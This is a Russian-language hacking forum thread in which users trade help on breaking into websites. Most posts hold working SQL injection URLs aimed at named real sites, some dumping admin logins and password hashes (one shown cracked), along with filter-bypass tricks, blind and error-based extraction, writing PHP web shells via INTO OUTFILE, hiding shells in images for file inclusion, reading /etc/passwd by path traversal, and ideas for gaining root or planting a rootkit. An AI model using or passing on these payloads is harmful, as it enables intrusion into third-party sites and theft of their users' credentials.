<code>» CHARACTER_SETS (0) » COLLATIONS (0) » COLLATION_CHARACTER_SET_APPLICABILITY (0) » COLUMNS (0) » COLUMN_PRIVILEGES (0) » KEY_COLUMN_USAGE (0) » ROUTINES (0) » SCHEMATA (0) » SCHEMA_PRIVILEGES (0) » STATISTICS (0) » TABLES (0) » TABLE_CONSTRAINTS (0) » TABLE_PRIVILEGES (0) » TRIGGERS (0) » USER_PRIVILEGES (0) » VIEWS (0) » cat_body (0) » cat_level (0) » cat_rubrics (0) » cat_set (0) » righttable (0) » user_group (0) » userlog (0) » usertable (0) » variables (0)</code>

http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7 from+information_schema.columns+where+table_name=0 x757365727461626c65+limit+1,1/*

http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,concat_ws(0x3a,usr_name,usr_passw ord),3,4,5,6,7+from+usertable+limit+1,1/*

получаю Денис:876993158b491f4626155b468ffb6edc
876993158b491f4626155b468ffb6edc=zerozero
но к админике не подходит! Почему?
В user_group нашол usr_id » grp_id но колонки с пасом не нашел!

masterBlack
Колонка usr_login

Вбиваю я
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7%20from+info rmation_schema.columns+where+table_name=0x7573725f 6c6f67696e+limit+1,1/*
а мне отображается пустая страница!

В чём проблема то?
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7+from+inform ation_schema.columns+where+table_name=0x7573657274 61626c65--
usr_id (0) » usr_name (0) » grp_id (0) » usr_login (0) » usr_password (0)

http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,concat_ws(0x3a,usr_id,usr_name,gr p_id,usr_login,usr_password),3,4,5,6,7+from+userta ble+limit+0,1--

1:Николай:0:aries:b3bd3c36b29a243c9f510720c d417d14

Оооо пасиба! а то Я чет ваше прогнался и накосячил с запросом!
А сбрутить поможете?

masterBlack, https://forum.antichat.org/thread67624.html

А как сдампить бд зная логин и пасс админа, но не зная ее располажения и названия? БД MySQL!!!

Помогите разобратся, надо знач SMF похекать,делаю все согласно тому что написано тут (http://forum.antichat.ru/showpost.php?p=435003&postcount=2) , но когда захожу на
http://site.com/forum/Themes/default/index.php меня перебрасывает на индекс форума, и я посмотрел на других форумах (с данной версий движка) с этого файла также перекидывает на главную форума, версию вроде не фиксили, что я не так делаю, спасибо

Народ
1. load_file(0x2F6574632F706173737764)
x2F6574632F706173737764
это какая кодировка? чем или где можно расшифровать?
2. чем или где можно закодировать, расшифровать в 16бит?
Заранее спс

2la.painkiller
1.x'hexstring'
2.http://www.bigprism.com/online-tools/base64-hex-ascii-encoder-decoder.html

кто нить ответит по поводу сообщения #2621 (http://forum.antichat.ru/showpost.php?p=770672&postcount=2621), есть ли так уъязвимость иль нету, че я не так делаю

маза в том что нужно чтобы админ перешёл по линку, когда он будет авторихован и чтобы у него всё сработало))

http://www.svetlana-russkaya.ru/index.php?pid=-101+union+select+1,2,3,4,5,6,7/*

Колонки подобраны не правильно,скоре всего


http://www.svetlana-russkaya.ru/index.php?pid=7&forf_tid=46+order+by+9/*&forf_page_num=1


помогите аскрутить плиз...

Да просто версия Мускуля - 3-я, у нее нет UNION'a:
http://www.svetlana-russkaya.ru/index.php?pid=101+and+substring(version(),1,1)=3
---
Боюсь в третьей версии ничего сделать не выйдет( слишком много ограничений...

хм и почему же ты так решил ? )
http://www.svetlana-russkaya.ru/index.php?pid=101
user=svetlana@localhost
database=svetlana
version=3.23.58
попробуй найти установочную директорию скрипта может если права на юзера криво выставленны удастся прочитать файлы

Всем привет!
Есть вопросы по MSSQL.
Есть рабочая уязвимость, например:
/?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
Все другие типы ( int,binary и т.д.) не возвращаются!!!
Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
/?part=items&id=1+OR+1=(select+top+1+cast(id+as+nvarchar)+from+ sa_names)--
или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarchar,id)+from+ sa_names)--
...значения не возвращаются...
И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
Заранее ОГРОМНОЕ СПАСИБО !!!

Помогите, пожалуйста, разобраться с правами шелла.

Суть проблемы:

Залил PHPшелл на сайт - права user/user.
Некий рутовский процесс скопировал этот сайт в директорию не доступную из web, но доступную из шелла. Соответсвенно скопировал и мой шелл. Поскольку при копировании файлу присваиваются права копирующего, то в этой директории шелл приобрел права root/wheel и доступен на чтение.
Я создал в директории доступной из web символическую(мягкую) ссылку на каталог(не на файл) в котором находится рутовский шелл и зашел на него через браузер.
В итоге файл-шелл имеет Permission root/wheel, но работает он почему-то на тех же правах user/user.

Нифига не пойму. Почему он НЕ работает на правах root?
Спасибо.

Нифига не пойму. Почему он НЕ работает на правах root?
Спасибо.Потому что в данном случае пхп запускается с правами апача, а не с правами владельца скрипта.

Пожалуйста ответьте на #2634

Потому что в данном случае пхп запускается с правами апача, а с теми правами владельца скрипта.
Пять раз прочел и не совсем понял, скорее всего ты пропустил частицу "не" перед "с правами апача".
Если так, то ведь владелец скрипта как раз root/wheel. А может ты пропустил частицу "не" перед "с теми правами владельца..."
Тогда нужен шелл на перл или другом языке? на каком? или может скомпилировать программу которая запустится как процесс и выполнит то что мне надо на правах root?

Пять раз прочел и не совсем понял, скорее всего ты пропустил частицу "не" перед "с правами апача".
Если так, то ведь владелец скрипта как раз root/wheel. А может ты пропустил частицу "не" перед "с теми правами владельца..."
Тогда нужен шелл на перл или другом языке? на каком? или может скомпилировать программу которая запустится как процесс и выполнит то что мне надо на правах root?
Потому что в данном случае пхп запускается с правами апача, а НЕ с теми правами владельца скрипта.
Взял на себя смелость поправить...)
Насчёт шелла на перле идея хорошая, только скомпилить прогу с рутовскими правами будет трудно. Как вариант можно попробовать добавить пользователя, а потом от его имени что-то компилить, например руткит...

могу просматривать весь комп:
http://badisow.49.212-215.is74.ru/userdir/message/messread.php?tm=c://windows

Что это,PHP-injection?
Или просто ошибка горе-кодера в ограничении?

Есть трабла:
Смог получить доступ к БД, нашел пхпмайадмин, далее пытаюсь залить шелл через запрос. Делаю так:

CREATE TABLE `123` (`shl` TEXT NOT NULL) TYPE = MYISAM; INSERT INTO `123` ( `shl` ) VALUES ('<?php include("тут_адрес_к_шеллу.php") ?>'); SELECT `shl` FROM `123` INTO OUTFILE ''; DROP TABLE `123`
Но оказывается какой-то запрет. Denied for 'user@localhost' (имя юзера дословно не пишу).

Может кто-нибудь знает в чем может быть трабла? Или запрос неправильный составляю... :confused:

Всем привет!
Есть вопросы по MSSQL.
Есть рабочая уязвимость, например:
/?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
Все другие типы ( int,binary и т.д.) не возвращаются!!!
Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
/?part=items&id=1+OR+1=(select+top+1+cast(id+as+nvarchar)+from+ sa_names)--
или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarchar,id)+from+ sa_names)--
...значения не возвращаются...
И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
Заранее ОГРОМНОЕ СПАСИБО !!!
Я что в игноре?:)
ПОЖАЛУЙСТА!!!! ПОМОГИТЕ!!!!!!!!!!!
хотя бы в ПМ

2USAkid по моему ты задавая вопрос сам ответил на него
Есть трабла:
Denied for 'user@localhost'
для залития шелла тебе нужны права filepriv у данного юзера их нет о чем и говорит данная ошибка ;)

Всем привет!
Есть вопросы по MSSQL.
Есть рабочая уязвимость, например:
/?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
Все другие типы ( int,binary и т.д.) не возвращаются!!!
Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
/?part=items&id=1+OR+1=(select+top+1+cast(id+as+nvarchar)+from+ sa_names)--
или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarchar,id)+from+ sa_names)--
...значения не возвращаются...
И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
Заранее ОГРОМНОЕ СПАСИБО !!!


У тебя условие:
/?part=npcs&id=1+OR+1=(select+db_name(1))

ошибка генерится в части OR 1=(~запрос~)
при выводе в результате запроса данных типа int или binary ошибка конвертации не генерится, просто не выполняется равенство. При выводе типов int, binary экспериментируй с типом левой части приравнивания (в данном случае замени единичку).

2USAkid по моему ты задавая вопрос сам ответил на него

для залития шелла тебе нужны права filepriv у данного юзера их нет о чем и говорит данная ошибка ;)

Блин... Ладно, поищу альтернативу :)

id=9'+and+1=if((version()=5),1,(select+table_name+ from+information_schema.tables))/*

А почему вдруг не пашет substring() ? И откуда вообще такая конструкция if() ? Хотя работает...

Количество скобок смущает =_=.Кстати,в таком случае только посимвольный перебор спасёт?)

2велимир а где там substring ? )

Да нет,я вообще говорю,что там не пашет 9'+and+substring(version(),1,1)=5/*

http://www.rauchfrei-info.de/index.php?id=9'+and+1=if((version()=5),1,(select+t able_name+from+information_schema.tables+limit+1,1 ))/*

?id=10-1 не работает )
and 1=1/* не работает )
либо просто скули нет либо просто фильтрации какая то очень странная

Да есть там скуля, работает на технологии more than 1 row
http://www.rauchfrei-info.de/index.php?id=9'+and+1=if(ord(substring((select%20t able_name%20from%20information_schema.tables%20lim it%200,1),1,1))=67,1,(select+table_name+from+infor mation_schema.tables))/*

2I-I00K
пожно по подробнее об этом ? гугль дал результаты на анлийском (\
ecли можно ссылку что бы почитать )

MaSTeR GэN, ttp://www.xakep.ru/magazine/xa/111/056/1.asp

2n0ne thx ;)

С этого момента любой оффтоп в этой теме будет наказыватся отрицательной репутацией. Тема называется ваши вопросы по уязвимостям, а не "нераскрученные скули" или "продайте сплойт". О чем стоит говорить в этой теме сказано в корневом сообщении, это последние китайское предупреждение

в mssql узнал первую таблицу: content_meta_tbl, пытаюсь узнать другие:
http://www.site.ru/students/content.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+('content_meta_tbl'))--
пишет
Incorrect syntax near 'content_meta_tbl'.
Поптыка узнать ячейки из этой таблица закончились также :(

zavra


content.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+(SELECT+TOP+2+TABLE_NAME+FROM+INFORMATION_SCHEMA .TABLES))--

перебирай второй TOP 1,2,3,4.....

content.asp?id=1+or+1=(SELECT+TOP+2+COLUMN_NAME+FR OM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='us ers')--
Incorrect syntax near 'users'.
что неправильного-то в синтаксисе?(

Ковычки фильтрует, в hex загони users

можно в Char()

http://www.site.org/article.php?id=80+or+1=(SELECT+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES+LIMIT+1,1)--

При подстановке любого числа в лимит выдаёт одну и ту же страницу.


http://www.site.org/article.php?id=80+order+by+4

Полей *якобы* 4.

http://www.site.org/article.php?id=80+union+select+1,2,3,4

The used SELECT statements have a different number of columns

Пробывал по всякому,но ничего не вышло.Версия пятая,mysql точно,ибо в ответе сказано,что это mysql.Комменты /* не принимает,что меня,кстати,удивило.(Приним ает только -- )

ссылку кинь в пм )

у меня такой вот вопрос, может не совсем по теме, но все-же нужно для эксплотирования уязвимости.
Как перевести обыкновенные символы (допустим <script>123</script> в код, типа %3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%7 8%74%2F%6A
???
Припомощи какой проги это делатся?
Мне просто нужно будет и скрипты и URL в такой код перевести.

вот держи сайт http://ha.ckers.org/xss.html там думаю разберешся в функциях

у меня такой вот вопрос, может не совсем по теме, но все-же нужно для эксплотирования уязвимости.
Как перевести обыкновенные символы (допустим <script>123</script> в код, типа
???
Припомощи какой проги это делатся?
Мне просто нужно будет и скрипты и URL в такой код перевести.

<?
if (!isset($_GET['a']))
{
die('?a=string');
}
$a = $_GET['a'];
$len = strlen($a);
$b = '';
for($i = 0; $i < $len; $i++)
{
$b = $b.'%'.dechex(ord($a[$i]));
}
echo $b."\r\n";
?>

Вообщем вопрос, как залить шелл картинкой, нираз читал про это, поидеи что нам нужно так это изменить код картинки и иметь где либо на сайте баг для исполнения пхп кода?

Вообщем вопрос, как залить шелл картинкой, нираз читал про это, поидеи что нам нужно так это изменить код картинки и иметь где либо на сайте баг для исполнения пхп кода?
Берёшь обычную .gif/.png/.jpg картинку, открываешь любым HexViewer'om или Notepad++ (им кстати удобней), и после того что там уже изачально было (сигнатура и прочее гомно), добавляешь .php код. Далее заливаешь на нужный тебе сайт, и если там есть локальный инклуд (для ремоута сразу проще ссылку на шелл вбить), прописываешь путь до твоей картинки на сайте. При выполнении функций include()/include_once() .php код выполнится, в каком бы расширении файла он не находился.

Берёшь обычную .gif/.png/.jpg картинку, открываешь любым HexViewer'om или Notepad++ (им кстати удобней), и после того что там уже изачально было (сигнатура и прочее гомно), добавляешь .php код. Далее заливаешь на нужный тебе сайт, и если там есть локальный инклуд (для ремоута сразу проще ссылку на шелл вбить), прописываешь путь до твоей картинки на сайте. При выполнении функций include()/include_once() .php код выполнится, в каком бы расширении файла он не находился.

1. Надо ли код картинки оставлять? или просто php код дописать в конце?
2. Можно ли с yandex.naroda.ru делать?
например http://lol.ru?page=http://yandex.narod.ru/zloyshell.jpeg ?
3. Вот инклуд с ../../../etc/passwd как определяется кол-во ../../../ ?
4. как распознать удаленый инклуд от локального?

1. Надо ли код картинки оставлять? или просто php дописать в конце?
2. Можно ли с yandex.naroda.ru делать?
например http://lol.ru?page=http://yandex.narod.ru/zloyshell.jpeg ?
3. Вот инклуд с ../../../etc/passwd как определяется кол-во ../../../ ?

1.
после того что там уже изачально было

2. можно, если удаленный инклюд

3. зависит от количества заданных каталогов в параметре. Т.е. если изначально запрос

include(/var/www/domain/vasya.ru/$page)

то кол-во .. будет равно 4. Но переборщить с .. нельзя) т.е. если в этом примере ты напишешь 30 .., то хуже не будет :) выше корня не уйдешь.

4. Пробуешь открыть скрипт, расположенный на др. сервере, если не открывает, то или отключено, или инклуд не удаленный.

спс всем! %)
а на счет админки http://www.mirf1.ru/
как или какими прогамми можно узнать строение сайта?

>> как или какими прогамми можно узнать строение сайта?
Сканеры head заголовков и прочего гомна. А вообще http://madnet.name/tools/madss/

Каталоги помому ваще фигня -

можно сделать ../../../../../../../../../../etc/passwd или

../etc/passwd

и все равно выдаст тот же фаил, если он есть)

Велемир,

зависит от количества заданных каталогов в параметре. Т.е. если изначально запрос

include(/var/www/domain/vasya.ru/$page)

то кол-во .. будет равно 4. Но переборщить с .. нельзя) т.е. если в этом примере ты напишешь 30 .., то хуже не будет выше корня не уйдешь.

Каталоги помому ваще фигня -

можно сделать ../../../../../../../../../../etc/passwd или

../etc/passwd

и все равно выдаст тот же фаил, если он есть)
Бред написал. Т.е. по твоему будет одноxуйственно?

include("/usr/blablabla/public_html/".$include_dir."blabla.php");
и
include("/usr/".$include_dir."blabla.php");

И при запросе
mda.php?include_dir=../../../etc/passwd%00
В обоих случаях выведет etc/passwd? Не стоит писать херню

include("/usr/blablabla/public_html/".$include_dir."blabla.php");
и
include("/usr/".$include_dir."blabla.php");

И при запросе
mda.php?include_dir=../../../etc/passwd%00
В обоих случаях выведет etc/passwd?

Если не ошибаюсь, то в твоем примере в обоих случаях выведет /etc/passwd ))

Добрый всем. Немогли бы вы подсказать по sql inj. На сайте www.viagra.by в поиске походу sql inj. При запросе '#.......
Отвечает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Как правильно далее выстроить запрос? '# union select null/* вроде не работает. Или просто не выводит ничего? Заранее спасибо за ответ.

причем тут # это тоже самое что и --
подставляй чтот тип.. '+union+select+1,2/*

а вообще намного удобние производить иньекцию здесь:
http://www.viagra.by/index.php?action=-1'+union+select+1,2,unhex(hex(version())),4,5/*

Ок, thx

Не волучается. =( С поиска передаются данные через POST, через GET не берет .

Выдает только:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1/*%' OR artikul LIKE '%'union+select+1/*%' OR description LIKE '%'' at line 1


Укажите плз нубу на его ошубку=)

выше запрос те же дали он работает )

Жесть =) Совсем мозг пропил пивом =) Спасибо=) Кажется спать иногда полезно =)

Есть сайт:
http://www.bikemaster.ru/admin/htmlarea/popups/lister.php?DPI=96&action=view&path=&file=..
Позволяет смотреть директории изображений.
SQL иньекцию прикрыли наглухо. И самое интересное - на следующий день после ее обнаружения (када спать уже пошел и сил небыло ничего делать.) Перебрасывает на главную страницу при любой попытке запроса.
Файл конфигурации includes/configure.php просто так не просмотреть.
Пробовал так: http://www.bikemaster.ru/admin/htmlarea/popups/lister.php?DPI=96&path=../../../../includes/configure.php , но сам файл никак не посмотреть.
Кто-нибудь может что-нибудь подсказать?

Вроде нельзя по провам юзера просматривать их, если я ниче не путаю

SQL иньекцию прикрыли наглухо.
http://www.bikemaster.ru/popup_image1.php?pID=-1'

http://www.bikemaster.ru/popup_image1.php?pID=-1'

+) Я чет файл popup_image1.php даже вблизи не видел на сайте :)

Оно просто не отображает или иньекция слепая?
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_passwo rd),3,4,5+from+administrators--
или:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a. customers_password.0x3a.customers_email_address).4 .5.6.7.8+from+customers--

А вот это хз, не раскручивал)

Иньекция кажется слепая. А вот это что такое:
http://www.bikemaster.ru/etc/passwd
Раз не пишет, что не найдена страница, значит оно есть :) Но что ето?

Кажется сайт неплохо защитили.

Оно просто не отображает или иньекция слепая?
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_passwo rd),3,4,5+from+administrators--
или:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a. customers_password.0x3a.customers_email_address).4 .5.6.7.8+from+customers--

Нет всё там нормально!
http://bikemaster.ru/popup_image1.php?pID=-1'+union+select+1,unhex(hex(concat_ws(user_name,0x 3a,user_password))),3,4,5+from+0x61646d696e6973747 261746f7273/*

Хелп не могу сделать запрос
http://www.autoexotica.ru/news/?nid=128' дыра
http://www.autoexotica.ru/news/?nid=128+order+by+11/* колонок
http://www.autoexotica.ru/news/?nid=128+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Пишет ошибку как так?
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11/*' at line 1
SELECT *, DATE_FORMAT(date, "%d.%m.%y") AS frm_date FROM news_data WHERE news_id=128 union select 1,2,3,4,5,6,7,8,9,10,11/*

Хелп не могу сделать запрос
http://www.autoexotica.ru/news/?nid=128' дыра
http://www.autoexotica.ru/news/?nid=128+order+by+11/* колонок
http://www.autoexotica.ru/news/?nid=128+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Пишет ошибку как так?
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11/*' at line 1
SELECT *, DATE_FORMAT(date, "%d.%m.%y") AS frm_date FROM news_data WHERE news_id=128 union select 1,2,3,4,5,6,7,8,9,10,11/*


Дело в том что на сервере стоит 3 версия MySQL которая не поддерживает в подзапросах union
http://www.autoexotica.ru/news/?nid=128+AND+ascii(lower(substring(version(),1,1)) )=51

Ни чего не выводит в таком запросе ( И что такое наконце 51 ?
где можно почитать про взлом 3 версии?

2 2la.painkiller та не в запросе просто опечатка должно быть
substring(version(),1,1)=3/*
почитать можно на ачате вота линк
http://forum.antichat.ru/showpost.php?p=565034&postcount=4
пора бы уж хотя бы форуму научиться поиск делать ;)

Нет всё там нормально!
http://bikemaster.ru/popup_image1.php?pID=-1'+union+select+1,unhex(hex(concat_ws(user_name,0x 3a,user_password))),3,4,5+from+0x61646d696e6973747 261746f7273/*

1064 - You have an error in your SQL syntax near 'union select ...

Когда убираешь кавычку перед union, то вообще пустой экран.

2 2la.painkiller та не в запросе просто опечатка должно быть
substring(version(),1,1)=3/*
почитать можно на ачате вота линк
http://forum.antichat.ru/showpost.php?p=565034&postcount=4
пора бы уж хотя бы форуму научиться поиск делать ;)


какая нахрен опечатка?
ascii там не зря стоит...
http://www.securitylab.ru/contest/212099.php

есть sql inject, но с лимитом! Есть желание вытащить базу емайлов,но их можно просматривать только по одному, а их > нескольких тысяч,как вытащить?

юзай сипт http://forum.antichat.ru/thread24918.html

Ребят, подскажите пли3 универсальный, хороший генератор паролей.
Для создания листов user;password
самое главное чтобы там была возможность-
1. создание листа, где пароль повторяет имя юзера... ( т.е. берет из файла логины и приписывает, повторяет, логин в пароль...
Спасибо

какая нахрен опечатка?
ascii там не зря стоит...
http://www.securitylab.ru/contest/212099.php

А помоему зря - версия БД начинается, всё равно, с цифр (другого я не видел, по крайней мере если БД - мускул), поэтому что бы узнать первую цифру версии использовать ascii() не обязательно.
А вот для вывода не цифровых данных использовать ascii() в общем случае нужно.

Никак не получается раскрутить инъекцию

http://storm.ikit.kg/stats/stats.php?game=D2XP&type=SC&sortBy=rank&sort_direction=1'

как только пытаюсь раскрутить пишет

sql injection attempt!

Никак не получается раскрутить инъекцию



как только пытаюсь раскрутить пишет
Какими запросами крутишь?
пишешь так:
http://storm.ikit.kg/stats/stats.php?game=D2XP&type=SC&sortBy=rank&sort_direction=1+union+select+1
Он ругается
а так:http://storm.ikit.kg/stats/stats.php?game=D2XP&type=SC&sortBy=rank&sort_direction=1+union/**/select+1
уже нет,значит скрипт плюется от union+select...делай выводы
ЗЫ:Я сам пока толком не крутил и не понял

Все равно вывести ничего не получается((((

http://storm.ikit.kg/stats/stats.php?game=D2XP&type=SC&sortBy=1+union/**/select+1/*
но т.к. стоит ORDER BY то union после него уже не работает.....
Error: Incorrect usage of UNION and ORDER BY
обойти можно токо заключив все селекты в скобки... и использовав UNION ALL. но сдесь это зделать нельзя.. так что ищи еще скули перед ордером.)

А помоему зря - версия БД начинается, всё равно, с цифр (другого я не видел, по крайней мере если БД - мускул), поэтому что бы узнать первую цифру версии использовать ascii() не обязательно.
А вот для вывода не цифровых данных использовать ascii() в общем случае нужно.

Не обязательно я не спорю, но я дал пример с использованием функции ascii(), и запрос тем самым не испортил, просто сравниваю код символа, а не символ.
ps думаю ты меня понял...

но т.к. стоит ORDER BY то union после него уже не работает.....

обойти можно токо заключив все селекты в скобки... и использовав UNION ALL. но сдесь это зделать нельзя.. так что ищи еще скули перед ордером.)

Нужно обратить внимание на саму ошибку

Query: SELECT * FROM d2ladder WHERE game = 'D2XP' and type='SC' ORDER BY 10/* DESC LIMIT 0,50
Error: Unknown column '10' in 'order clause'

в переменную sortBy мы передаем значение которое подставляется в конструкцию ORDER BY. Из этого можно сделать вывод, что в таблице d2ladder 9 колонок.
А вообще иньекция интересная, есть над чем подумать...

_Pantera_
ок 9 колонок ) только как ты запрос устроишь ? )

Народ,а при залитии шелла через скулю можно как-то обойти ругательство на кавычки ? =______________=.

Вот: http://site.com/news.php?id=-17+union+select+1,'<?php%20eval($_GET[‘e’]);?>',3+into+outfile+'/usr/local/www/data/partners.php'--

Выдаёт: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php on line 35

Ужс какой-то...

Велемир, нельзя :)

День добрый. Подскажите пожалуйста, как корректно оформить запрос к этому ресурсу:
http://www.clubiki.ru/index.php?page=item&id=24696)+union+select+(1

Заранее спсибо.

http://www.clubiki.ru/index.php?page=item&id=-24696)%20union%20select%201,2,version(),4,5,6/*

Народ чтото странно.
Хочу залить шел на форум через админку там только jpeg swf и все подобные
Мне тут сказали что в любую картинку можно вставить шел, но у меня не получается (
Вот как я это делал картинка 1.jpeg открываю в notepad++ там иероглифы в самом конце через строчку вожу точно рабочий код шела (когда в .php он работает) вот так
<?
код шела
?>
сохраняю в виде kartinka_shell_1.jpeg
И когда заливаю всё нормально, делаю на главное страницы сылку на этот рисунок, жму на неё и пустой экран (
Что я неправильно делаю?
мб кто выложит точно рабочий шел? в jpeg

Народ чтото странно.
Хочу залить шел на форум через админку там только jpeg swf и все подобные
Мне тут сказали что в любую картинку можно вставить шел, но у меня не получается (
Вот как я это делал картинка 1.jpeg открываю в notepad++ там иероглифы в самом конце через строчку вожу точно рабочий код шела (когда в .php он работает) вот так
<?
код шела
?>
сохраняю в виде kartinka_shell_1.jpeg
И когда заливаю всё нормально, делаю на главное страницы сылку на этот рисунок, жму на неё и пустой экран (
Что я неправильно делаю?
мб кто выложит точно рабочий шел? в jpeg
Омфг. Хоть в подпись себе вставляй. ПХП код исполнится только при инклуде. Или же если на сервере настроено исполнение пхп кода в имэйджах (не видел никогда такого). Без инклуда, толку от твоей картинки 0.

1. etc/htpasswd/secure

Кто-нить знает что лежит тут?))

2. Может такое быть,что пароли от фтп хранятся ТОЛЬКО в etc/shadow.
3. Если лог-фаил существует, но непоказывает содержимое.Означает ли это отсутствие файла,или же нехватку прав на их просмотр ?
4.Слышал,что через ЛЮБЫЕ лог файлы можно залить шелл,если они просматриваются...тобишь доступны.Так ли это ? (slip.log,debug.log,auth.log,ppp.log и другие).Собственно - лог файлы access и log отличаются только видом доступа.

Да,и ещё: Какие условия необходимы для глобального инклуда в скрипте ?(Извините за нуббизм,но всё же),помимо allow_url_fopen ?


ЗЫ: К примеру,логи админки подойдут ?

/home/host/htdocs/admin/log/error.log

Велемир,

2. С чего ты взял что они вообще там храняца? :) Почитай -http://ru.wikipedia.org/wiki/Passwd

3. Если лог-фаил существует...Означает ли это отсутствие файла. Ты сам-то понял чего хотел сказать?))

4. Обязателен не только тот фактор, что они должны быть читабельны, но и что бы файл мог быть исполнен (т.е. должен быть инклюд. Это я к тому, что load_file() через скулю не прокатит) - это раз. А два - ты должен иметь возможность оставить в логе определенный след (т.е. шелл), чтобы потом его выполнить через инклюд.

5. Иметь пустой инклюд, т.е. без предварительно вписанного какого-нибудь пути. Или ты что-то другое имел в виду?


з.ы. по просьбам особо внимательных :) - http://ru.wikipedia.org/wiki/Passwd#.D0.A4.D0.B0.D0.B9.D0.BB_.2Fetc.2Fshadow

у меня такая проблема:
[http://site.ru]/index.php?act=25+AND+ascii(lower(substring(user(), 1,1)))=97--
запрос проходит удачно, вытянул юзера, весию: 5.1.2.2

далее была идея подобрать таблицы и колонки так же способом:
index.php?act=25+and+ascii(lower(substring(table_n ame,1,1)))>10+from+information_schema.tables+limit+0,1--

результата ноль. может ли кто подсказать метод раскрутки подобных скулей, хотябы теоретически.
сайт пока не палю, когда получу от него то, что надо - выложу в соответствующей теме -)
edited: непосредственно "кавычки" фильтруются, через char(39 / 34) не фильтрует, BENCHMARK не ощущается что проходит (скорее всего парсится).

Велемир,


И как всегда,благодарим за ответ))).А отсутствие файла я имел в виду отсутствие его содержимого - пустой короче говоря)).

Велемир, просто логгирование может быть отключено :) Или файл создала установка по дефолту, а потом настройки меняли и файл куда-то переехал, а остался пустой, не используемый лог-файл. Всякое может быть)


Calcutta, ttp://forum.xaknet.ru/thread5614.html

https://forum.antichat.ru/thread76312-blind.html


TehRn, возможно, дыра на сайте жертвы закрыта :) Ты посмотри на дату - релиз 2005 года :)

у меня такая проблема:

попробуй автоматизировать, можно набросать скрипт-эксплоит на той же перловке.
если я правильно понял, у тебя нет желания париться с ручным перебором, у меня была подобная проблемка, я ее решил на перле: https://forum.antichat.ru/showpost.php?p=743258&postcount=545

скрипт кривоват, но суть та же.

вопрос собственно такой..есть скуля.. постгрескл без поле вывода..то бишь слепая..спасибо многоуважаемому SQLHACK за его прогу сипт, с её помощью вывел таблицы и колонки..но вот беда когда бручу таблицу с юзерами имена виводит нормально а вот пассы только ******** какие есть идейки?

имена виводит нормально а вот пассы только ******** какие есть идейки?
:)
Идейка есть такая:

Ты пытаешься вывести пароли из таблицы в которой их нет, а именно-pg_user

Пароли хранятся в таблице pg_shadow , а на прочтение её у тебя 99.9% не хватит прав

2jokester тогда какие идеи?я не очень знаком с постгрескл..как ты говорил там присутствует pg_shadow , каким образом мне вытащить пассы или это нереально?

Gorev , А что нужно-то?

Ты пытаешься вынуть пароли от базы, это врятли получится.
В базе могут быть пароли от админок CMS , форума, и т.д.
Чего ты хочешь добиться то?

ну мне админка нужна...

ну мне админка нужна...
Ну так и ищи под неё пароли в базе, если они там есть.
Если нет-- ничего не делать, пароль от базы ты не вынешь скорее всего. В PostgreSQL доступ к pg_shadow имеет только superuser, так-что прав у тебя не хватит её прочитать

http://forum.antichat.ru/showpost.php?p=783899&postcount=2000

я могу с помощью этой XSS ломать ящики?

Пароли хранятся в таблице pg_shadow
pg_shadow в постгресе не таблица

